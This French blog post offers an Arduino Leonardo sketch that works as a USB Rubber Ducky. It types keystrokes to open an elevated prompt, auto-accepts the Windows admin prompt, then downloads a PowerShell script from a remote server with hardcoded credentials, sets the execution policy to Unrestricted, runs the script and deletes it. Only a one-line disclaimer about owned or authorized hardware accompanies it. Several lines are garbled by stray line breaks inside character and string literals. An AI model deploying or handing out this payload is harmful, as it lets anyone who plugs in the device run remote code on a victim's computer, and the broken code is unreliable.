Exécution d’un Script Powershell avec une USB Rubber Ducky Arduino Leonardo

Le code ci-dessous est utilisable sur un Arduino Leonardo ou n’importe quel autre device ayant comme chip « MEGA32U4 ». Le script va télécharger sur une URL distante un script powershell, puis va le copier sur le bureau et enfin l’exécuter avant de quitter le Shell.

Utilisé à des fins de pentest un USB Rubber Ducky doit être utilisé sur des matériels dont vous êtes propriétaire ou avec autorisation.

#include "KeyboardAzertyFr.h"
void start() {
  KeyboardAzertyFr.begin();
  rdLongerDelay();
}
void finish() {
  KeyboardAzertyFr.end();
}
void rdDelay() {
  delay(100);
}
void rdLongerDelay() {
  for(int i = 0; i < 5; i++) rdDelay();
}
void rdWriteText(String text) {
  KeyboardAzertyFr.print(text);
  rdDelay();
}
void rdTypeKey(uint8_t key)
{
  KeyboardAzertyFr.press(key);
  rdDelay();
  KeyboardAzertyFr.release(key);
  rdDelay();
}

/***********************
 *      Libraries      *
 ***********************
 * You may remove the  *
 * unused functions    *
 * before uploading    *
 * the code to the     *
 * arduino             *
 ***********************/

/**
 * Runs a program.
 * Example: "notepad" starts notepad, "calc" starts the calculator.
 */
void rdRun(String program) {
  rdGuiCombination('r');
  KeyboardAzertyFr.print(program);
  rdDelay();
  rdTypeKey(KEY_RETURN);
}

/**
 * Takes a screenshot.
 */
void rdPrintScreen() {
  // some machines use 206 key as the PrtScreen key
  // others might use 229, and others might use both so
  // we use both instructions
  rdTypeKey(206);
  rdTypeKey(229);
  KeyboardAzertyFr.print(F("h"));
  rdDelay();
  KeyboardAzertyFr.print(F("b"));
  rdDelay();
}

/**
 * Opens the JavaScript console on a browser.
 */
void rdOpenJavascriptConsole() {
  rdKeyCombination(KEY_LEFT_CTRL, KEY_LEFT_SHIFT, 'i');
}

/**
 * Hides a window:
 * Basically it drags a window to the lowest it can be
 * and then repositions the cursor.
 */
void rdHideWindow() {
  rdAltCombination(' ');
  KeyboardAzertyFr.print(F("M"));
  rdDelay();
  KeyboardAzertyFr.press(KEY_DOWN_ARROW);
  // 100 should be enough to guarantee the window is as low as possible
  // also please notice that 100 is not the real number of strokes since
  // some of the strokes are ignored.
  for(int i = 0; i < 10; i++) rdLongerDelay();;
  KeyboardAzertyFr.release(KEY_DOWN_ARROW);
  // return repositions the cursor back to its original position
  rdTypeKey(KEY_RETURN);
}

/**
 * Same as Win + D
 */
void rdShowDesktop() {
  rdGuiCombination('d');
}

/**
 * Same as Ctrl + V
 */
void rdPaste() {
  rdCtrlCombination('v');
}

/**
 * Same as Ctrl + X
 */
void rdCut() {
  rdCtrlCombination('x');
}

/**
 * Same as Ctrl + C
 */
void rdCopy() {
  rdCtrlCombination('c');
}

/**
 * Same as Gui + (the received key)
 */
void rdGuiCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_GUI, c);
}

/**
 * Same as Alt + (the received key)
 */
void rdAltCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_ALT, c);
}

/**
 * Same as Ctrl + (the received key)
 */
void rdCtrlCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_CTRL, c);
}

/**
 * Same as Shift + (the received key).
 */
void rdShiftCombination(uint8_t c) {
  rdKeyCombination(KEY_LEFT_SHIFT, c);
}

/**
 * Same as (Received hold key) + (target key).
 */
void rdKeyCombination(uint8_t holdKey, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey);
  rdDelay();
  KeyboardAzertyFr.press(targetKey);
  rdDelay();
  KeyboardAzertyFr.releaseAll();
  rdDelay();
}

/**
 * Same as (Received hold key 1) + (received hold key 2) + (target key).
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, targetKey);
}

/**
 * Same as above but with one more hold key.
 */
void rdKeyCombination(uint8_t holdKey1, uint8_t holdKey2, uint8_t holdKey3, uint8_t targetKey) {
  KeyboardAzertyFr.press(holdKey1);
  rdDelay();
  rdKeyCombination(holdKey2, holdKey3, targetKey);
}

/**
 * Opens the command prompt without admin rights.
 */
void rdOpenCommandPrompt() {
  rdOpenCommandPrompt(false);
}

/**
 * Opens the command prompt, if the "admin" parameter
 * has a "true value", it opens a command prompt
 * with admin rights. Or without admin rights otherwise.
 */
void rdOpenCommandPrompt(boolean admin) {
  if (admin) {
    rdGuiCombination('x');
    KeyboardAzertyFr.print(F("a"));
    delay(100);
    rdAcceptWindowsSmartScreen();
  } else {
    rdRun("cmd");
  }
}

/**
 * Accepts the windows smart screen to grant admin permissions.
 */
void rdAcceptWindowsSmartScreen() {
  // Wait untill smart screen shows up
  rdLongerDelay();
  rdTypeKey(KEY_LEFT_ARROW);
  rdDelay();
  KeyboardAzertyFr.print(F(" "));
  rdDelay();
}

/**
 * Changes the keyboard layout, if the computer only
 * has 1 keyboard layout this key combination won't
 * do anything.
 */
void rdChangeKeyboardLayout() {
  rdAltCombination(KEY_LEFT_SHIFT);
}

/**
 * It runs one or multiple powershell scripts,
 * to run multiple scripts, separate them with a new line "\n" char.
 */
void rdPowershellRun(String scripts) {
  char delimiter = '
\n';
  String finalScript = "powershell ";
  while (scripts.indexOf('
\n') > 0) {
    finalScript = finalScript + "(" + scripts.substring(0, scripts.indexOf('
\n')) + ") ; ";
    scripts = scripts.substring(scripts.indexOf('
\n') + 1);
  }
  //finalScript = finalScript + "(" + scripts + ")";
  finalScript = finalScript + scripts;
  rdRun(finalScript);
}

void typeKey(int key)
{
  KeyboardAzertyFr.press(key);
  delay(500);
  KeyboardAzertyFr.release(key);
}

/*********************
 *      Arduino      *
 *********************/
// ---------------------------------------------------
//  '
' est le symbole qui désigne un espace, il a la valeur 44
//  Alt Gr azerty                   €                                                                    ~  #  {  [  |  `  \  ^  @    '
'  ]  }  ¤      
//   Shift azerty       Q  B  C  D  E  F  G  H  I  J  K  L  ?  N  O  P  A  R  S  T  U  V  Z  X  Y  Z  1  2  3  4  5  6  7  8  9  0    '
'  °  +  ¨  £  µ  No fr  M  %  NONE  .  /  §    >
//         azerty       q  b  c  d  e  f  g  h  i  j  k  l  ,  n  o  p  a  r  s  t  u  v  z  x  y  z  &  é  "  '
 (  -  è  _  ç  à    ' '  )  =  ^  $  *  No fr  m  ù   ²    ;  :  !    <
//         qwerty       a  b  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v  w  x  y  z  1  2  3  4  5  6  7  8  9  0    ' '  -  =  [  ]  \  No US  ;  '   `    ,  .  /   No US      
//       scancode       4, 5, 6, 7, 8, 9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,  44, 45,46,47,48,49,  50,  51,52, 53,  54,55,56,  100};

void setup() {

   
  start();
  //Ouverture Powershell en administrateur
  rdOpenCommandPrompt(true);
  delay(500);
  //debut de telechargement dun script distant
  KeyboardAzertyFr.print("$output = $env:USERPROFILE");

  //affiche un + pour concat powershell
  KeyboardAzertyFr.press(KEY_LEFT_SHIFT);
  KeyboardAzertyFr.print("=");//affiche un + pour concat
  KeyboardAzertyFr.release(KEY_LEFT_SHIFT);

  KeyboardAzertyFr.print("'
");
 
  // Pour composer le caractère \ dans le path powershell
  // Alt Gr = Ctrl + Alt
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // ou keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
 
   KeyboardAzertyFr.print("
Desktop");
   
  KeyboardAzertyFr.press(KEY_LEFT_CTRL);
  KeyboardAzertyFr.press(KEY_LEFT_ALT);
  keyboardScanCode(37); // ou keyboard.print('\');
  KeyboardAzertyFr.release(KEY_LEFT_ALT);
  KeyboardAzertyFr.release(KEY_LEFT_CTRL);
  KeyboardAzertyFr.print("
GetRessources.ps1';");
  KeyboardAzertyFr.print("$securepassword = ConvertTo-SecureString '
user00290987' -AsPlainText -Force;$credentials = New-Object System.Management.Automation.PSCredential('user002', $securepassword);Invoke-WebRequest -Uri http://monip/ressources/GetRessources.ps1 -OutFile $output -Credential $credentials;Set-ExecutionPolicy Unrestricted -force; & $output;Remove-Item -path $output;exit;");

   delay(500);
   rdTypeKey(KEY_RETURN);

 
  finish();


 
}

void loop() {}



void keyboardScanCode(byte code){
  KeyboardAzertyFr.press(code+136);
  delay(5);
  KeyboardAzertyFr.release(code+136);
}

Laisser un commentaire